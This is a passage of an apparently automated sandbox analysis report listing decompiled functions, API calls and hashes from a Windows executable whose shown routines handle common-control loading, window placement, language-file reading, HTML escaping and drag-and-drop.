                                                                                                                                                                                                                          0x00404618
                                                                                                                                                                                                                          0x00404628
                                                                                                                                                                                                                          0x00404629
                                                                                                                                                                                                                          0x0040462a
                                                                                                                                                                                                                          0x0040462f
                                                                                                                                                                                                                          0x00404630
                                                                                                                                                                                                                          0x00404631
                                                                                                                                                                                                                          0x0040463c
                                                                                                                                                                                                                          0x0040463d
                                                                                                                                                                                                                          0x0040463e
                                                                                                                                                                                                                          0x00404656
                                                                                                                                                                                                                          0x00404662
                                                                                                                                                                                                                          0x0040466b
                                                                                                                                                                                                                          0x0040466d
                                                                                                                                                                                                                          0x0040466e
                                                                                                                                                                                                                          0x00404674
                                                                                                                                                                                                                          0x00404679

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Delete_snwprintfmemset$Close
                                                                                                                                                                                                                          • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                                                                                                                          • API String ID: 1018939227-3575174989
                                                                                                                                                                                                                          • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                                                                                                                          0x0040314a
                                                                                                                                                                                                                          0x00403151
                                                                                                                                                                                                                          0x00403158
                                                                                                                                                                                                                          0x0040315a
                                                                                                                                                                                                                          0x00403162
                                                                                                                                                                                                                          0x00403166
                                                                                                                                                                                                                          0x00403190
                                                                                                                                                                                                                          0x00403190
                                                                                                                                                                                                                          0x00403198
                                                                                                                                                                                                                          0x00403199
                                                                                                                                                                                                                          0x0040319e
                                                                                                                                                                                                                          0x004031bb
                                                                                                                                                                                                                          0x004031a0
                                                                                                                                                                                                                          0x004031ad
                                                                                                                                                                                                                          0x004031b6
                                                                                                                                                                                                                          0x004031b6
                                                                                                                                                                                                                          0x0040319e
                                                                                                                                                                                                                          0x0040316e
                                                                                                                                                                                                                          0x00403176
                                                                                                                                                                                                                          0x0040317c
                                                                                                                                                                                                                          0x0040317f
                                                                                                                                                                                                                          0x0040317f
                                                                                                                                                                                                                          0x00403182
                                                                                                                                                                                                                          0x0040318a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040318c
                                                                                                                                                                                                                          0x0040318c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040318c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                          • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                          • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                                                                                                                          0x00404da9
                                                                                                                                                                                                                          0x00404dbc
                                                                                                                                                                                                                          0x00404dbf
                                                                                                                                                                                                                          0x00404dc6
                                                                                                                                                                                                                          0x00404dcc
                                                                                                                                                                                                                          0x00404dce
                                                                                                                                                                                                                          0x00404de1
                                                                                                                                                                                                                          0x00404deb
                                                                                                                                                                                                                          0x00404df2
                                                                                                                                                                                                                          0x00404df4
                                                                                                                                                                                                                          0x00404df4
                                                                                                                                                                                                                          0x00404e07
                                                                                                                                                                                                                          0x00404e0d
                                                                                                                                                                                                                          0x00404e18
                                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                                          0x00404e1e
                                                                                                                                                                                                                          0x00404e27
                                                                                                                                                                                                                          0x00404e28
                                                                                                                                                                                                                          0x00404e29
                                                                                                                                                                                                                          0x00404e2f
                                                                                                                                                                                                                          0x00404e31
                                                                                                                                                                                                                          0x00404e37
                                                                                                                                                                                                                          0x00404e41
                                                                                                                                                                                                                          0x00404e42
                                                                                                                                                                                                                          0x00404e43
                                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                                          0x00404e4d
                                                                                                                                                                                                                          0x00404e50
                                                                                                                                                                                                                          0x00404e5f
                                                                                                                                                                                                                          0x00404e66
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                                          0x00404e6d
                                                                                                                                                                                                                          0x00404e70
                                                                                                                                                                                                                          0x00404e85
                                                                                                                                                                                                                          0x00404e85
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404e72
                                                                                                                                                                                                                          0x00404e7b
                                                                                                                                                                                                                          0x00404e80
                                                                                                                                                                                                                          0x00404e83
                                                                                                                                                                                                                          0x00404e87
                                                                                                                                                                                                                          0x00404e89
                                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                                          0x00404ea8
                                                                                                                                                                                                                          0x00404ea8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00404e83

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E07
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00404E12
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                                          • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                          			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                                                                                          0x0040639c
                                                                                                                                                                                                                          0x004063a4
                                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                                                          0x004063d3
                                                                                                                                                                                                                          0x004063dc
                                                                                                                                                                                                                          0x004063eb
                                                                                                                                                                                                                          0x004063f0
                                                                                                                                                                                                                          0x00406401
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040641e
                                                                                                                                                                                                                          0x0040641f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063B2
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063C2
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                                                                                                                            • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                          • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                                                                                          0x0040adf6
                                                                                                                                                                                                                          0x0040adf8
                                                                                                                                                                                                                          0x0040adfa
                                                                                                                                                                                                                          0x0040adfb
                                                                                                                                                                                                                          0x0040adfb
                                                                                                                                                                                                                          0x0040ae02
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae04
                                                                                                                                                                                                                          0x0040ae05
                                                                                                                                                                                                                          0x0040ae6d
                                                                                                                                                                                                                          0x0040ae6e
                                                                                                                                                                                                                          0x0040ae73
                                                                                                                                                                                                                          0x0040ae76
                                                                                                                                                                                                                          0x0040ae7f
                                                                                                                                                                                                                          0x0040ae83
                                                                                                                                                                                                                          0x0040ae86
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae86
                                                                                                                                                                                                                          0x0040ae8f
                                                                                                                                                                                                                          0x0040ae0c
                                                                                                                                                                                                                          0x0040ae10
                                                                                                                                                                                                                          0x0040ae1e
                                                                                                                                                                                                                          0x0040ae3b
                                                                                                                                                                                                                          0x0040ae4a
                                                                                                                                                                                                                          0x0040ae65
                                                                                                                                                                                                                          0x0040ae7a
                                                                                                                                                                                                                          0x0040ae7e
                                                                                                                                                                                                                          0x0040ae67
                                                                                                                                                                                                                          0x0040ae67
                                                                                                                                                                                                                          0x0040ae68
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae68
                                                                                                                                                                                                                          0x0040ae4c
                                                                                                                                                                                                                          0x0040ae4c
                                                                                                                                                                                                                          0x0040ae4e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae4e
                                                                                                                                                                                                                          0x0040ae3d
                                                                                                                                                                                                                          0x0040ae3d
                                                                                                                                                                                                                          0x0040ae3f
                                                                                                                                                                                                                          0x0040ae53
                                                                                                                                                                                                                          0x0040ae54
                                                                                                                                                                                                                          0x0040ae59
                                                                                                                                                                                                                          0x0040ae5c
                                                                                                                                                                                                                          0x0040ae5c
                                                                                                                                                                                                                          0x0040ae20
                                                                                                                                                                                                                          0x0040ae28
                                                                                                                                                                                                                          0x0040ae2d
                                                                                                                                                                                                                          0x0040ae30
                                                                                                                                                                                                                          0x0040ae30
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae10

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                                                                                                                          0x004041f9
                                                                                                                                                                                                                          0x00404205
                                                                                                                                                                                                                          0x00404208
                                                                                                                                                                                                                          0x00404217
                                                                                                                                                                                                                          0x0040421e
                                                                                                                                                                                                                          0x00404236
                                                                                                                                                                                                                          0x0040423f
                                                                                                                                                                                                                          0x0040424a
                                                                                                                                                                                                                          0x0040425f
                                                                                                                                                                                                                          0x0040426b
                                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                                          0x00404275
                                                                                                                                                                                                                          0x004043be
                                                                                                                                                                                                                          0x004043ce
                                                                                                                                                                                                                          0x004043d0
                                                                                                                                                                                                                          0x004043d3
                                                                                                                                                                                                                          0x004043da
                                                                                                                                                                                                                          0x004043da
                                                                                                                                                                                                                          0x004043c0
                                                                                                                                                                                                                          0x004043c3
                                                                                                                                                                                                                          0x004043c3
                                                                                                                                                                                                                          0x0040427b
                                                                                                                                                                                                                          0x0040428c
                                                                                                                                                                                                                          0x0040428f
                                                                                                                                                                                                                          0x00404295
                                                                                                                                                                                                                          0x004042a5
                                                                                                                                                                                                                          0x004042b8
                                                                                                                                                                                                                          0x004042cb
                                                                                                                                                                                                                          0x004042de
                                                                                                                                                                                                                          0x004042f1
                                                                                                                                                                                                                          0x00404304
                                                                                                                                                                                                                          0x00404317
                                                                                                                                                                                                                          0x0040432a
                                                                                                                                                                                                                          0x0040433d
                                                                                                                                                                                                                          0x00404350
                                                                                                                                                                                                                          0x00404363
                                                                                                                                                                                                                          0x00404376
                                                                                                                                                                                                                          0x00404389
                                                                                                                                                                                                                          0x0040439c
                                                                                                                                                                                                                          0x004043a4
                                                                                                                                                                                                                          0x004043af
                                                                                                                                                                                                                          0x004043b5
                                                                                                                                                                                                                          0x004043b5
                                                                                                                                                                                                                          0x004043f5

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040421E
                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2142561256-3993045852
                                                                                                                                                                                                                          • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                                                                                                                          Uniqueness

